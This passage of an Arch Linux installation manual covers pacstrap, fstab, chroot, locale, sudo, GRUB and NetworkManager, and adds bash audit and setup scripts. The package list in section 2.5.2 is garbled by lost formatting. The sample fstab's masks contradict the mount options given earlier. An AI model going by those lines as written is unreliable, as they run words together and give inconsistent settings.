Preparing and mounting boot/EFI: In Arch Linux there is some debate about where to mount the EFI partition: /mnt/efi, /mnt/boot/efi or /mnt/boot. Mounting it directly at /boot is the simplest and the recommended method if you use systemd-boot, and it works with GRUB too, since the kernels (vmlinuz) and initramfs images are then stored directly on the FAT32 partition the UEFI firmware can read. Because FAT has no Unix permissions, mount it with fmask=0077,dmask=0077 so that the kernel, the initramfs and the bootloader's random-seed file are readable only by root; genfstab will carry these options into /etc/fstab.
We create the directory in our new root and mount the partition:
mkdir /mnt/boot
mount -o fmask=0077,dmask=0077 /dev/nvme0n1p1 /mnt/boot
You can verify that your hierarchy is assembled with:
lsblk
You should see a hierarchical structure with /mnt on partition 3 and /mnt/boot on partition 1.
2.5 Installation of the Base Ecosystem (Pacstrap)
At this point, we've prepared the physical and logical groundwork. It's time to install the operating system. In other distributions, the installer copies files from the ISO to the disk. In Arch, we use a script called pacstrap, essentially a wrapper around the package manager pacman. pacstrap downloads the latest packages directly from the Arch Linux mirrors, verifies their signatures, and installs them into /mnt. This ensures that, when the installation completes, the system is already fully up to date.
2.5.1 Download Mirrors
pacstrap will use the list of servers (mirrors) defined in /etc/pacman.d/mirrorlist. In the past, users had to manually search for the fastest servers in their country to avoid downloads at 1990s modem speeds. Today, the Arch ISO includes a background service, reflector, which fetches the official mirror status, ranks recently synchronized mirrors for you, and rewrites the mirrorlist. If your connection is active, this step is already optimized. If you want to pin it to your region, run reflector yourself, for example reflector --country Spain --protocol https --latest 20 --sort rate --save /etc/pacman.d/mirrorlist. Restricting to https matters more than it looks: pacman verifies package signatures, but in the default configuration the repository databases themselves are not signed, so the transport is what protects the database download from tampering.
2.5.2 Selecting the Core Packages
The command pacstrapIt requires you to explicitly specify which package groups or individual packages will form your operating system. Arch's minimalism demands that you carefully consider your needs.
The fundamental elements of a modern GNU/Linux system are:
baseThis is an empty metapackage that indicates the minimum required dependencies. It will install the initialization system.systemd,pacman, C libraries (glibc), and core GNU utilities (coreutils) such ascp,ls,catImportant note: Since 2019 , the metapackagebaseIt no longer includes a kernel, text editor, or network support. You must install these explicitly.- The Kernel (
linuxThis will download the kernel image and its modules. If you are a server administrator, you can choose to download the kernel image and its modules right here.linux-ltsWe will use the stable onelinux. - Firmware (
linux-firmware) : Proprietary binary code that hardware manufacturers require for graphics cards, Wi-Fi adapters, and Bluetooth chips to function. Without it, you could have a working kernel, but no ability to communicate with your hardware. - Editors (
vimthenanoThese are essential for modifying configuration files in the next step. Install the one you are most comfortable with. (Nano is intuitive, Vim is powerful). - Network tools (
networkmanagerandiwd) : If you do not install them now, when you restart your new machine you will find yourself without internet and completely unable to install the graphical environment. - CPU Microcode (
intel-ucodetheamd-ucodeuse Modern CPUs are so complex that they have their own internal software with bugs (remember Spectre or Meltdown). The operating system can inject patches into the CPU during boot. Depending on your physical machine's processor, you must install the corresponding patch package. If your processor is Intel,intel-ucodeIf it's AMD, useamd-ucode.
Run the deployment with the final orchestration command (assuming an Intel CPU and nano as the editor):
pacstrap -K /mnt base linux linux-firmware nano networkmanager iwd intel-ucode
(The -K flag initialises a new, empty pacman keyring in the target and populates it with the Arch packager keys instead of copying the live ISO's keyring, so the installed pacman starts from a clean cryptographic state of its own.)
The process will download between 400 MB and 800 MB depending on the packages chosen, verify the signatures, and install everything under /mnt. Watch the terminal output: it is an X-ray of the building blocks of Linux scrolling past.
2.6 Mount Persistence (fstab)
If you rebooted now, your new operating system would not know which disk holds the root file system or where the boot partition lives. We need to generate the fstab (File System Table) configuration file. The init system reads /etc/fstab during startup to learn which partitions to mount and with which parameters (read-only, quotas, access-time behaviour, and so on).
Historically, fstab was written with static device paths (e.g. /dev/sda1). This was catastrophic if you plugged in a USB drive and the kernel decided that the USB stick was now sda and your hard drive had become sdb. To solve this architectural disaster, UUIDs (Universally Unique Identifiers) are used: 128-bit values, effectively unique, written into the file system's metadata when you format it.
Arch provides the tool genfstab to automate this: it detects what is currently mounted under /mnt and writes it out using UUIDs.
We execute:
genfstab -U /mnt >> /mnt/etc/fstab
(Syntax: -U forces the use of UUIDs. >> is the shell redirection operator that takes the output of genfstab and appends it to the end of /mnt/etc/fstab, creating the file if it does not exist. Appending rather than overwriting matters: run the command twice and you get duplicate entries, which is one more reason to inspect the result.)
Fstab Auditing and Verification: In Linux, trust is good, but control is better. Never proceed without auditing automatically generated configuration files.
cat /mnt/etc/fstab
You should see a structure similar to this (the UUIDs are illustrative; yours will differ):
# /dev/nvme0n1p3
UUID=3a4b5c6d-7e8f-9a0b-1c2d-3e4f5a6b7c8d / ext4 rw,relatime 0 1
# /dev/nvme0n1p1
UUID=1234-ABCD /boot vfat rw,relatime,fmask=0022,dmask=0022,codepage=437,iocharset=ascii,shortname=mixed,utf8,errors=remount-ro 0 2
# /dev/nvme0n1p2
UUID=9f8e7d6c-5b4a-3f2e-1d0c-b9a8f7e6d5c4 none swap defaults 0 0
Let's quickly analyse the fields:
- Device: the UUID of the partition. Each one should correspond to a partition you created; you can cross-check them against the symlinks under /dev/disk/by-uuid.
- Mountpoint: where it is mounted in the tree (/, /boot, none for swap).
- FSType: the file system type (ext4, vfat, swap).
- Options: mount options. rw (read/write); relatime (a crucial optimisation: the access-time metadata is only rewritten when it is older than the modification time, sparing an SSD a metadata write on every file read).
- Dump and Pass: the fifth field is for the legacy dump backup tool and is normally 0. The sixth is the order in which fsck (File System Check) checks the file systems at boot: the root partition should be 1, other file systems 2, and 0 disables the check (always 0 for swap).
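The audit above can be automated. The following script, added here and not part of the book, parses an fstab in the format genfstab produces and flags the things a first boot trips over: a /dev/sdX reference instead of a persistent identifier, a missing root entry, and fsck pass numbers that are not 1 for /, 2 (or 0) for other file systems and 0 for swap. The two sample tables at the bottom are constructed, with invented UUIDs; against the real file you would run audit_fstab < /mnt/etc/fstab.

```shell
#!/usr/bin/env bash
# Added example, not from the book: automate the fstab audit described above.
# Reads fstab text on stdin, reports each finding on stderr and prints the
# number of findings on stdout, so it can be scripted:  audit_fstab < /mnt/etc/fstab
audit_fstab() {
    local findings=0 saw_root=0
    local dev mnt fs opts dump pass
    while read -r dev mnt fs opts dump pass; do
        # Skip blank lines and the "# /dev/..." comments genfstab writes.
        case "$dev" in ''|'#'*) continue ;; esac

        # /dev/sdX names can be renumbered between boots; only persistent
        # identifiers (UUID, PARTUUID, LABEL, PARTLABEL) are acceptable.
        case "$dev" in
            UUID=*|PARTUUID=*|LABEL=*|PARTLABEL=*) ;;
            *) echo "$mnt: unstable device reference '$dev'" >&2
               findings=$((findings + 1)) ;;
        esac

        if [ "$mnt" = "/" ]; then
            saw_root=1
            if [ "$pass" != "1" ]; then
                echo "/: fsck pass must be 1, got '${pass:-missing}'" >&2
                findings=$((findings + 1))
            fi
        elif [ "$fs" = "swap" ]; then
            if [ "$pass" != "0" ]; then
                echo "swap: fsck pass must be 0, got '${pass:-missing}'" >&2
                findings=$((findings + 1))
            fi
        else
            case "$pass" in
                0|2) ;;
                *) echo "$mnt: fsck pass should be 2 (or 0 to skip), got '${pass:-missing}'" >&2
                   findings=$((findings + 1)) ;;
            esac
        fi
    done
    if [ "$saw_root" != 1 ]; then
        echo "no entry mounts /" >&2
        findings=$((findings + 1))
    fi
    echo "$findings"
}

# Constructed samples (invented UUIDs) so the audit can be exercised offline.
GOOD_FSTAB='# /dev/nvme0n1p3
UUID=3a4b5c6d-7e8f-9a0b-1c2d-3e4f5a6b7c8d / ext4 rw,relatime 0 1
# /dev/nvme0n1p1
UUID=1234-ABCD /boot vfat rw,relatime,fmask=0022,dmask=0022 0 2
# /dev/nvme0n1p2
UUID=9f8e7d6c-5b4a-3f2e-1d0c-b9a8f7e6d5c4 none swap defaults 0 0'

BAD_FSTAB='/dev/sda1 / ext4 defaults 0 2
UUID=1234-ABCD /boot vfat defaults 0 2
/dev/sda2 none swap defaults 0 1'

printf '%s\n' "$GOOD_FSTAB" | audit_fstab   # prints 0
printf '%s\n' "$BAD_FSTAB"  | audit_fstab   # prints 4 (two device paths, two bad pass fields)
```

The count on stdout makes the check usable as a gate in an install script (anything other than 0 means stop and look), while the messages on stderr tell you what to fix.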
If the fstab file looks correct and isn't empty, you can breathe a huge sigh of relief. The physical, logical, and binary foundation of the operating system is now installed and consolidated on your hardware.
In the next and crucial chapter (Chapter 3), we will use the powerful concept of "Chroot" to mentally teleport ourselves into this new system and perform the final configuration (language, time zone, users) and, most importantly, install the brain that will orchestrate the boot process: the GRUB boot manager.
Chapter 3: The Chroot and Internal Configuration
After running pacstrap in the previous chapter, we downloaded hundreds of megabytes of binaries and laid them out neatly on the hard drive (mounted at /mnt). However, we are still running on the RAM and kernel of the temporary live USB.
To set up the new system you have to get inside it: make the commands you run believe the hard drive is the entire universe and hide the USB drive from them completely. This trick is called chroot (change root).
3.1 The Theory and Practice of the Chroot
chroot is an operation on Unix-like systems that changes the apparent root directory (/) for the current process and all of its children. A program running inside the chroot cannot see, open or modify files outside the new root through ordinary path lookups. It is one of the earliest forms of sandboxing and a precursor of modern containers, but on its own it is not a security boundary: a root process inside a chroot can still escape it, and it shares the kernel, devices and network with the host. Here we use it purely as an installation tool.
In Arch Linux we use an enhanced wrapper, arch-chroot, provided by the arch-install-scripts package (the same package that ships pacstrap and genfstab).
Why arch-chroot rather than plain chroot?
A bare chroot requires you to mount the kernel's virtual file systems (API file systems) into the target before entering: /dev (device nodes), /proc (process and kernel information), /sys (sysfs: hardware and firmware, including the efivars needed to write UEFI boot entries) and /run (runtime state of daemons). If you entered with a plain chroot without those mounts, utilities such as grub-install would fail spectacularly because they could not see the disks or the UEFI variables. arch-chroot performs those bind mounts for you and also makes the live system's resolv.conf available inside, so you keep internet access in the new environment.
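To make concrete what arch-chroot does for you, here is a simplified reimplementation of its setup and teardown, added as an example and not the arch-chroot script itself. The mount order and the --make-rslave step are the parts that matter: without the slave propagation, an unmount inside the chroot would propagate back to the live system. The run wrapper and its DRY_RUN variable are assumptions of this example so that the sequence can be inspected without root.

```shell
#!/usr/bin/env bash
# Added example, not the arch-chroot script itself: a simplified version of the
# mounts arch-chroot performs, so you can see what a bare chroot is missing and
# reproduce it on a rescue system that lacks arch-install-scripts.
# Needs root for real use; with DRY_RUN=1 it prints the commands instead.
run() {
    if [ -n "${DRY_RUN:-}" ]; then echo "$*"; else "$@"; fi
}

chroot_setup() {
    local root="$1"
    # Bind the target onto itself first so the API mounts below belong to it.
    run mount --bind "$root" "$root"
    run mount -t proc /proc "$root/proc"
    # sysfs and devtmpfs are bound recursively (they carry sub-mounts such as
    # /sys/firmware/efi/efivars and /dev/pts) and then marked slave so that
    # unmounting inside the chroot does not propagate back to the live system.
    run mount --rbind /sys "$root/sys"
    run mount --make-rslave "$root/sys"
    run mount --rbind /dev "$root/dev"
    run mount --make-rslave "$root/dev"
    run mount --bind /run "$root/run"
    # Copy (dereferencing the symlink) the live resolver so pacman can reach mirrors.
    run cp -L /etc/resolv.conf "$root/etc/resolv.conf"
}

chroot_teardown() {
    local root="$1" d
    # Undo in reverse order; -R also drops nested sub-mounts such as /dev/pts.
    for d in run dev sys proc; do
        run umount -R "$root/$d"
    done
    run umount "$root"    # removes the self bind-mount, not the partition under it
}

chroot_enter() {
    local root="$1"
    chroot_setup "$root"
    run chroot "$root" /bin/bash
    chroot_teardown "$root"
}

# Dry run to inspect the sequence:  DRY_RUN=1 chroot_enter /mnt
```

On the real ISO you simply run arch-chroot /mnt; this listing is the reason grub-install works inside it and fails inside a bare chroot.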
3.1.1 Execution
Simply run:
arch-chroot /mnt
You will notice that the prompt changes slightly (typically from the ISO's coloured zsh prompt to a basic bash one, [root@archiso /]#). Congratulations: you are now effectively logged into your own operating system on the NVMe/SATA drive, using the binaries you just downloaded (your own bash, nano, pacman, and so on). Every command from this point on is written permanently to your disk.
3.2 Time Zone and Hardware Clock
A computer keeps time with two different clocks:
- System time (the kernel's system clock): a clock in memory that disappears when you power off. The kernel maintains it while the system runs, usually synchronised over the internet with NTP.
- Hardware clock (RTC, Real Time Clock): a physical clock on the motherboard powered by the CR2032 coin cell; it keeps ticking while the computer is unplugged.
3.2.1 Time Zone Configuration
The system needs to know where you are to add or subtract hours from UTC. Time zone definitions live under /usr/share/zoneinfo/.
To list continents and regions:
ls /usr/share/zoneinfo
To list the cities in a region (Europe, for example):
ls /usr/share/zoneinfo/Europe
We create a symbolic link (a shortcut pointing at the right definition) at /etc/localtime. For Madrid, Spain:
ln -sf /usr/share/zoneinfo/Europe/Madrid /etc/localtime
(For Latin America you could use America/Mexico_City, America/Argentina/Buenos_Aires, America/Bogota, and so on.)
3.2.2 Hardware Clock Synchronisation (hwclock)
Now that the system knows its time zone, we write the current system time to the motherboard clock, which also generates /etc/adjtime (recording, among other things, whether the RTC is kept in UTC):
hwclock --systohc
By default Linux assumes the hardware clock is in UTC (Coordinated Universal Time). This is the correct and standard practice, especially on servers: Linux reads UTC from the motherboard and derives local time from the time zone you configured.
The dual-boot problem with Windows: for historical compatibility with MS-DOS, Windows assumes the motherboard clock is in local time. If you have both Windows and Linux installed they fight over it: Linux sets the RTC to UTC and shows the correct local time; Windows then reads that UTC value as local time and shows the wrong time, "corrects" it by rewriting the RTC, and the next Linux boot is off by your UTC offset. The professional fix is not to force Linux to local time but to make Windows use UTC: open the Registry Editor (regedit), navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation and create a DWORD (32-bit) value named RealTimeIsUniversal with the value 1. Windows will then keep the RTC in UTC like every other modern system.
3.3 System Locale and Language
The "locale" is a cornerstone of POSIX operating systems. It dictates not only the language (Spanish, English) but also how programs classify characters, how numbers are formatted (decimal comma or point), how dates are represented, and the character encoding (UTF-8). A misconfigured locale shows accented letters as question marks or boxes and breaks Python scripts that read text files.
3.3.1 Locale Generation (locale.gen)
In Arch Linux you generate your own locales. First tell the system which ones you want by enabling them in the master configuration file.
Open the file with your editor (we assume nano):
nano /etc/locale.gen
The file contains hundreds of commented-out entries (prefixed with #). Find and uncomment (remove the #) the ones you need. It is recommended always to keep American English as a fallback, since some build tools and scripts assume it. For a user in Spain:
en_US.UTF-8 UTF-8
es_ES.UTF-8 UTF-8
(If you are in another Spanish-speaking country, uncomment the corresponding entry instead, e.g. es_MX.UTF-8 or es_AR.UTF-8. Do NOT uncomment the ISO-8859 variants; those are obsolete. Always use the entries ending in UTF-8.)
Save the file (Ctrl+O, Enter, Ctrl+X in nano). Now compile the locale data:
locale-gen
3.3.2 Environment Configuration Files
Once generated, you tell the system which one to use by default, through the LANG environment variable.
Create the file locale.conf:
echo "LANG=es_ES.UTF-8" > /etc/locale.conf
Optionally, for users who want precision, you can mix: keep the language in English (so that terminal error messages are searchable online) but use Spanish date formats, paper size (A4) and currency (€):
# In /etc/locale.conf
LANG=en_US.UTF-8
LC_TIME=es_ES.UTF-8
LC_MONETARY=es_ES.UTF-8
LC_PAPER=es_ES.UTF-8
(Every value you set here must be one you generated in the previous step; otherwise programs fail to set that category and fall back to the C locale, with the broken accents described above.)
3.3.3 Keyboard Layout in the Console (vconsole.conf)
The keyboard layout we loaded with loadkeys es in Chapter 2 lives only in RAM. To keep the Spanish layout the next time you boot into the TTY console (the black screen before the graphical environment), create vconsole.conf:
echo "KEYMAP=es" > /etc/vconsole.conf
(Use la-latin1 instead of es for a Latin American keyboard.)
3.4 Network Configuration: Hostname and Hosts
Your machine's identity on local networks is its hostname. It is what you see on your router or in the prompt of SSH sessions from other computers.
Create /etc/hostname containing the name you want for the PC. It must be a single label: lowercase letters, digits and hyphens, no spaces or other symbols. For example arch-workstation, srv-produccion or simply arch:
echo "arch-workstation" > /etc/hostname
3.4.1 Local Name Resolution (/etc/hosts)
The file /etc/hosts is a primitive phone book that the resolver consults before asking DNS servers. It matters that the machine can resolve its own name to the loopback network (127.0.0.0/8): several local services (PostgreSQL, local web servers, even sudo's lookup of the host name) produce long timeouts or warnings if the hostname cannot be resolved.
Open the file:
nano /etc/hosts
Add the following, replacing arch-workstation with the name you chose above:
127.0.0.1 localhost
::1 localhost
127.0.1.1 arch-workstation.localdomain arch-workstation
(127.0.0.1 is the IPv4 loopback address and ::1 the IPv6 one. 127.0.1.1 is the Debian-inherited convention for a host that has no permanent address of its own.)
3.5 Identity Management: Passwords, Users and Privileges (sudo)
In the hierarchy of a UNIX system, root is God: unrestricted permission to read any process's memory, reformat disks on the fly or erase the entire operating system without warning. Working as root for day-to-day tasks is a massive security risk, not only because malware would meet no barrier, but because a single typo meets none either.
3.5.1 Superuser (root) Password
We need to secure the main account:
passwd
It asks for the new password and then for a confirmation. For security reasons (no echo), the terminal shows no asterisks or dots while you type; type with confidence. Pick a long passphrase: root's password is the last line of defence if your user account or your sudo configuration is ever compromised.
3.5.2 Creating Your Standard User
We will create the user you will use 99% of the time:
useradd -m -G wheel -s /bin/bash francesc
Let's break down this crucial command:
- useradd: the system binary that creates identities.
- -m (make home): creates the personal directory /home/francesc, copying the template from /etc/skel.
- -G wheel (groups): adds the user to the supplementary group wheel. On Red Hat and Arch-based distributions, wheel is the administrative group entitled to escalate privileges (on Debian/Ubuntu that role belongs to the sudo group).
- -s /bin/bash (shell): sets bash as the user's login shell.
- francesc: the username (conventionally lowercase).
Of course, set a password for the new user:
passwd francesc
3.5.3 Privilege Escalation: sudo Configuration
The user is in the administrators' group, but the tool that lets you "borrow" root's powers temporarily, sudo, is not preinstalled on Arch. That is a design decision: some sysadmins prefer doas (from OpenBSD) or simply use su.
We install sudo:
pacman -S sudo
Which users may use sudo is configured in /etc/sudoers. Never edit that file directly with nano or vim: a syntax error in sudoers locks you out of your own administrative access. The safe editor is visudo, which validates the syntax on save and refuses to write the file if it finds an error.
By default visudo opens vi. If you prefer nano, override the EDITOR variable for that one command:
EDITOR=nano visudo
Scroll down until you find the section mentioning the wheel group. You will see a line like this:
# %wheel ALL=(ALL:ALL) ALL
Remove the pound sign (#) to uncomment it, save and exit. From now on any member of wheel (such as the user we just created) can run administrative commands by prefixing them with sudo and typing their own password (not root's). Leave the neighbouring NOPASSWD variant commented out: passwordless sudo for a whole group turns any compromise of that user's session into a silent root compromise. After the first login you can confirm what the new account is allowed to do with sudo -l.
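As an added example (not from the book), the steps of this section as a script. It validates the username with the portable rule useradd applies by default, creates the user, and grants wheel its rights through a drop-in file under /etc/sudoers.d that is run through visudo -c -f before being installed; that check is what keeps a typo from locking you out, and a drop-in is easier to audit and revert than edits to /etc/sudoers itself. The user name francesc and the file name 10-wheel are assumptions of the example.

```shell
#!/usr/bin/env bash
# Added example, not from the book: provision the administrative user and grant
# wheel its sudo rights through a drop-in that is syntax-checked before it is
# installed, so a typo can never lock you out the way a broken /etc/sudoers would.
# The user name "francesc" and the drop-in name "10-wheel" are assumptions.

# The portable user-name rule useradd applies by default: a lowercase letter or
# underscore, then lowercase letters, digits, underscore or hyphen, at most 32 chars.
valid_username() {
    local LC_ALL=C name="$1"
    [ "${#name}" -ge 1 ] && [ "${#name}" -le 32 ] || return 1
    case "$name" in
        [a-z_]*) ;;
        *) return 1 ;;
    esac
    case "$name" in
        *[!a-z0-9_-]*) return 1 ;;
    esac
    return 0
}

# Write "%wheel ALL=(ALL:ALL) ALL" to DIR/10-wheel (DIR defaults to /etc/sudoers.d).
# The rule is validated with visudo -c -f on a temporary file first; sudo itself
# ignores drop-ins with loose permissions, so the file is installed as 0440.
install_wheel_rule() {
    local dir="${1:-/etc/sudoers.d}" tmp
    tmp=$(mktemp) || return 1
    printf '%s\n' '%wheel ALL=(ALL:ALL) ALL' > "$tmp"
    chmod 0440 "$tmp"
    if command -v visudo >/dev/null 2>&1; then
        if ! visudo -c -f "$tmp" >/dev/null; then
            echo "sudoers rule failed validation, not installing" >&2
            rm -f "$tmp"
            return 1
        fi
    fi
    if ! cp "$tmp" "$dir/10-wheel"; then
        rm -f "$tmp"
        return 1
    fi
    rm -f "$tmp"
    chmod 0440 "$dir/10-wheel"
}

provision_admin() {
    local name="$1"
    valid_username "$name" || { echo "invalid user name: $name" >&2; return 1; }
    useradd -m -G wheel -s /bin/bash "$name" || return 1
    passwd "$name" || return 1
    install_wheel_rule /etc/sudoers.d
}

# Inside the chroot, as root:  provision_admin francesc
```

If you use this instead of editing /etc/sudoers, the %wheel line in the main file stays commented and the grant lives in a single small file you can remove to revoke it.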
3.6 The Boot Manager (Bootloader): GRUB and systemd-boot
The final and most delicate step inside the chroot is installing the bootloader. Without it the firmware has no way to load the Linux kernel into RAM when you power on, leaving you with a black screen or a "No Bootable Device Found" error.
There are several boot managers for UEFI systems:
- GRUB (GRand Unified Bootloader): the heavyweight. Extremely configurable; it can boot ISO images directly, supports graphical themes, can unlock LUKS-encrypted disks before the kernel loads, and understands complex file systems such as ZFS or Btrfs. Its universality makes it the safe choice.
- systemd-boot: a minimalist boot manager shipped with systemd. It is very fast, configured with three-line plain-text files, and elegant in its simplicity. However, it requires the kernels to live on the EFI system partition (FAT32) and is less flexible in complex dual-boot setups.
Since we are building a comprehensive and robust manual, we will use GRUB; its maturity covers almost every hardware scenario.
3.6.1 Installing the GRUB Packages
First install GRUB and the tool that manipulates UEFI boot variables (efibootmgr):
pacman -S grub efibootmgr
(Note for dual-boot: if Windows is installed on another disk and you want GRUB to offer a menu to choose between Arch and Windows, also install os-prober and mount the Windows EFI partition; this is covered under advanced configuration. Since GRUB 2.06, os-prober is disabled by default for security reasons, because it mounts and scans every partition it can find while grub-mkconfig runs; you enable it deliberately with GRUB_DISABLE_OS_PROBER=false in /etc/default/grub.)
3.6.2 Deploying the UEFI Binary (grub-install)
The following command assembles a small .efi image and installs it on the partition mounted at /boot (the FAT32 EFI system partition we created in Chapter 2). It also uses efibootmgr to write a boot entry into the firmware's NVRAM so that it appears in the motherboard's boot menu. For that last step to work you must have booted the ISO in UEFI mode: if /sys/firmware/efi/efivars is empty, you are in legacy BIOS mode and the entry cannot be written.
Execute carefully:
grub-install --target=x86_64-efi --efi-directory=/boot --bootloader-id=GRUB
- --target=x86_64-efi: builds the image for 64-bit UEFI firmware.
- --efi-directory=/boot: the path where our FAT32 partition is mounted.
- --bootloader-id=GRUB: the name shown in the motherboard's boot menu (usually reached with F12 or a similar key) and the name of the subdirectory under /boot/EFI where the binary is placed. You can call it "ArchLinux" or whatever you like.
If the command succeeds it ends with the message "Installation finished. No error reported."
3.6.3 Generating the Configuration File (grub.cfg)
grub-install only installs the engine. Now we generate the map (the menu) that tells the engine where to find the kernel (vmlinuz-linux) and the initial RAM file system (initramfs-linux.img). GRUB ships a generator that scans your disks and writes this menu:
grub-mkconfig -o /boot/grub/grub.cfg
In the terminal output you will see the script detect the Linux images and the Intel/AMD microcode installed by pacstrap, and create the corresponding menu entries.
3.6.4 (Optional) Checking the Microcode in GRUB
If you installed intel-ucode or amd-ucode, grub-mkconfig injects the microcode image automatically as the first initrd, ahead of initramfs-linux.img, in each menu entry. This means that before your operating system loads, the bootloader hands the processor its updated microcode, closing hardware vulnerabilities before any code of yours runs. You can confirm it by looking for lines of the form "initrd /intel-ucode.img /initramfs-linux.img" in /boot/grub/grub.cfg: the microcode must come first, otherwise the kernel will not apply it early.
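An added example, not from the book, with the checks worth running inside the chroot before you reboot: that the UEFI binary exists where grub-install put it for the bootloader id you chose, that every initrd line in grub.cfg loads the microcode image first, and (roughly) that an NVRAM entry exists. The default paths match the --efi-directory=/boot and --bootloader-id=GRUB values used above; any other arguments are yours.

```shell
#!/usr/bin/env bash
# Added example, not from the book: checks to run inside the chroot after
# grub-install and grub-mkconfig, before rebooting. Paths assume the
# --efi-directory=/boot and --bootloader-id=GRUB values used above.

# grub-install writes the UEFI binary to <ESP>/EFI/<bootloader-id>/grubx64.efi.
check_efi_binary() {
    local esp="${1:-/boot}" id="${2:-GRUB}"
    [ -f "$esp/EFI/$id/grubx64.efi" ]
}

# Every "initrd" line in grub.cfg must name the microcode image first: the
# kernel's early loader expects the uncompressed microcode cpio at the front of
# the initrd chain, and a wrong order silently leaves the CPU unpatched.
check_ucode_order() {
    local cfg="${1:-/boot/grub/grub.cfg}" bad=0
    local kw first rest
    [ -r "$cfg" ] || { echo "cannot read $cfg" >&2; return 1; }
    while read -r kw first rest; do
        [ "$kw" = "initrd" ] || continue
        case "$first" in
            */intel-ucode.img|*/amd-ucode.img) ;;
            *) echo "microcode is not the first initrd: initrd $first $rest" >&2; bad=1 ;;
        esac
    done < "$cfg"
    return "$bad"
}

# The NVRAM entry efibootmgr should have created (rough check; needs efivars).
check_nvram_entry() {
    local id="${1:-GRUB}"
    efibootmgr | grep -q "$id"
}

# Usage inside the chroot:
#   check_efi_binary && check_ucode_order && check_nvram_entry && echo "boot layout OK"
```

check_ucode_order is also worth rerunning after any kernel or microcode package update that regenerates grub.cfg.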
3.7 Enabling the Network Manager and Closing
If we rebooted now we would have a functional Arch Linux: GRUB would start, the kernel would load and we would reach a login prompt asking for a username and password. But we would have no internet. The network stack of the live ISO (systemd-networkd and iwd) does not carry over to the installed system. In Chapter 2 we installed networkmanager; now we tell the init system to start it at every boot:
systemctl enable NetworkManager
(Note the capital letters in NetworkManager: it is one of the few unit names on Linux that uses them.)
This ensures that after the reboot we have a robust network service, able to connect over cable or manage Wi-Fi networks (covered in Chapter 4).
3.7.1 The Elegant Exit
Your work as a system surgeon inside the chroot is done. Time to close the patient, clean the instruments and wake the machine.
- Leave the chroot:
exit
(Or Ctrl+D. The prompt returns to the ISO's zsh prompt.)
- Unmount the partitions (golden practice):
Although a reboot would force it, unmounting by hand guarantees that every buffer in RAM has been written to the SSD before power is cut.
umount -R /mnt
(-R means recursive: it unmounts /mnt/boot first and then /mnt, in the correct order.)
- Reboot:
reboot
Remove the installation USB drive right away. If you followed the instructions precisely, the firmware will locate the GRUB UEFI binary you installed and the GRUB selection screen will appear for the first time, opening the door to your new, pristine Arch Linux. In the following chapters we leave installation behind to master system administration and the graphical environment.
Chapter 4: Advanced Networking and Audio Architecture
Welcome to your new Arch Linux installation. You have a working kernel and an unprivileged user with sudo, but your system is isolated from the world. In user-friendly operating systems, networking and audio "just work". In Arch you build and understand these communication bridges yourself. This chapter demystifies network configuration and the tangled evolution of audio on Linux.
4.1 Network Architecture in Linux and NetworkManager
Historically, networking on Linux was configured by hand, editing /etc/network/interfaces and running monolithic commands such as ifconfig. Today, desktop and laptop connectivity demands a dynamism the classic method cannot offer (switching from a coffee-shop Wi-Fi to a corporate VPN and then to an Ethernet cable within seconds). This is where NetworkManager comes in: a daemon backed by Red Hat that has become the de facto standard.
4.1.1 The Command-Line Tool: nmcli
NetworkManager has graphical front ends, but a systems administrator masters nmcli. It lets you do, programmatically, everything you could do from a visual interface.
To see the overall status of all your interfaces:
nmcli device status
Managing Wi-Fi from the terminal: NetworkManager drives wpa_supplicant or iwd under the hood. To scan for networks and connect:
- Trigger a scan and list the networks:
nmcli device wifi list
- Connect to a new network. NetworkManager saves the profile, including the pre-shared key in clear text, as a keyfile under /etc/NetworkManager/system-connections/. Those files are created owned by root with mode 0600, and that file mode is the only thing protecting the password:
nmcli device wifi connect "SSID_DE_LA_RED" password "Tu_Contraseña"
(Typing the password on the command line also leaves it in your shell history; nmcli --ask device wifi connect "SSID_DE_LA_RED" prompts for it instead.)
Profile (connection) management: in NetworkManager you do not configure the "network card" directly; you work with connections (profiles) that are applied to devices. To list your saved profiles:
nmcli connection show
To force a static IP address (useful on servers) instead of DHCP:
nmcli connection modify "Nombre_Perfil" ipv4.addresses "192.168.1.50/24"
nmcli connection modify "Nombre_Perfil" ipv4.gateway "192.168.1.1"
nmcli connection modify "Nombre_Perfil" ipv4.dns "192.168.1.1"
nmcli connection modify "Nombre_Perfil" ipv4.method manual
nmcli connection up "Nombre_Perfil"
(With ipv4.method manual, DHCP is no longer consulted, so the DNS server must be set explicitly as well; otherwise the profile comes up with no resolver. The value shown assumes the router answers DNS, as most home gateways do.)
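Added example, not from the book: an audit of the keyfiles mentioned above. Because NetworkManager stores the Wi-Fi PSK (and VPN or 802.1X passwords) in clear text, the file mode is the whole defence, and a keyfile copied around or restored from a backup with the wrong permissions hands the password to every local user. This script reports every keyfile in a directory that carries a secret and is readable by group or others. The directory argument exists so it can be run against a copy; the constructed files in the usage note are illustrative.

```shell
#!/usr/bin/env bash
# Added example, not from the book: audit the NetworkManager keyfiles for
# secrets that anyone besides root could read. Pass a directory argument to
# run it against a copy; the default is the live directory (needs root to read).
audit_nm_secrets() {
    local dir="${1:-/etc/NetworkManager/system-connections}" f mode owner loose=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        # Only keyfiles that actually carry a secret are interesting.
        grep -Eq '^(psk|password|wep-key[0-9]|private-key-password)=' "$f" || continue
        # ls -l rather than stat: its first and third fields are the same on GNU and BSD.
        set -- $(ls -ld "$f")
        mode=${1#?}     # drop the file-type character, keep rwxrwxrwx
        owner=$3
        case "$mode" in
            ???------|???------[.+]) ;;   # no group/other bits ('.'/'+' = SELinux/ACL marker)
            *) echo "INSECURE $mode $owner $f" >&2; loose=$((loose + 1)) ;;
        esac
        [ "$owner" = "root" ] || echo "WARNING: $f is not owned by root" >&2
    done
    echo "$loose"
}

# sudo audit_nm_secrets   -> prints how many secret-bearing keyfiles are group/world readable;
#                            fix any hit with: chown root:root FILE && chmod 600 FILE
```

Run it after restoring /etc from a backup or after moving profiles between machines; NetworkManager itself refuses to load keyfiles it considers insecure, so a hit here also explains a profile that has mysteriously disappeared from nmcli connection show.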
When you type google.com, your system must translate that name into an IP address. By default NetworkManager uses the DNS servers your router hands out. In more demanding environments you will want systemd-resolved, which adds a local cache and DNS over TLS (DoT), so that your queries are not readable by your ISP or anyone else on the path. (DoT hides the DNS query itself; the IP addresses and TLS server names of the sites you then visit remain visible to the network.)
Enable the local systemd resolver:
sudo systemctl enable --now systemd-resolved.service
